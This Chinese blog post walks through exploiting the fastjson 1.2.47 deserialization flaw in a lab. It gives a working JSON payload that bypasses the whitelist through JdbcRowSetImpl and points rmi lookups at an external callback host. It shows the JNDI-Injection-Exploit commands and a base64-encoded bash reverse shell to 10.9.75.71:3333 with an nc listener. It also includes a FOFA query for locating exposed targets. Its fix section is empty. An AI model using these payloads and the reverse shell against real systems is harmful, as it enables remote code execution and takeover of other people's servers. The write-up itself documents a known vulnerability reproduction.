fastjson_1.2.47 反序列化漏洞复现

fastjson_1.2.47_反序列化漏洞

说明内容
漏洞编号
漏洞名称fastjson 1.2.47 反序列化漏洞
漏洞评级高危
影响范围Fastjson<=1.2.47
漏洞描述fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
修复方案升级
打补丁
上设备

漏洞描述

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

漏洞等级

高危

影响版本

  • Fastjson<=1.2.47

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
fastjson1.2.47

漏洞扫描

使用FastjsonScan进行扫描

  1. 登录界面,进行抓包

    image-20230919112636301

  2. 修改为request请求,添加变量,进行检测

    image-20230919112830055

  3. 使用插件Fastjson插件

    image-20230919112924235

  4. 扫描成功,得到poc

    image-20230919113001526

漏洞验证

  1. 使用Fastjson scan得到的poc

    {"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ebt3t9dkij5hrso4zfa49a0pvg16pv.oastify.com/aaa","autoCommit":true}}
    
  2. 使用JNDI-Injection-Exploit构造rmi服务器

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/cwc" -A "10.9.75.71"
    

    image-20230919113239813

  3. 在bp中发送rmi

    "dataSourceName":"rmi://10.9.75.71:1099/x3d285",
    

    image-20230919113333569

  4. 进入容器内部,查看是否生成文件

    image-20230919113416672

深度利用

GetShell

  1. 构造反弹Shell命令

    bash -i >& /dev/tcp/10.9.75.71/3333 0>&1
    //进行base64编码
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjcxLzMzMzMgMD4mMQ}|{base64,-d}|{bash,-i}
    
  2. kali中打开监听

    nc -lnvp 3333
    
  3. 将启动工具的命令进行更改

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjcxLzMzMzMgMD4mMQ}|{base64,-d}|{bash,-i}" -A "10.9.75.71"
    

    image-20230919114010738

  4. 使用生成的rmi或ldap进行测试

    "dataSourceName":"rmi://10.9.75.71:1099/zkrter",
    

    image-20230919114050183

  5. 反弹成功

    image-20230919114125752

漏洞挖掘

网络测绘

FOFA

"fastjson"

修复建议

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值